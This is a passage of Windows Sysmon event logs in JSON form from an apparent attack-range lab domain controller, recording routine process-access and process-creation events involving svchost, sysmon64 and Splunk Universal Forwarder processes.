C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001095660300}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001095660300}","TargetProcessId":"3900","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.303\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001064670300}\r\nProcessId: 3920\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-001095660300}\r\nParentProcessId: 3900\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.303","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001064670300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-001095660300}","ParentProcessId":"3900","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001095660300}\r\nSourceProcessId: 3900\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001064670300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001095660300}","SourceProcessId":"3900","SourceThreadId":"3904","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001064670300}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001064670300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001064670300}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 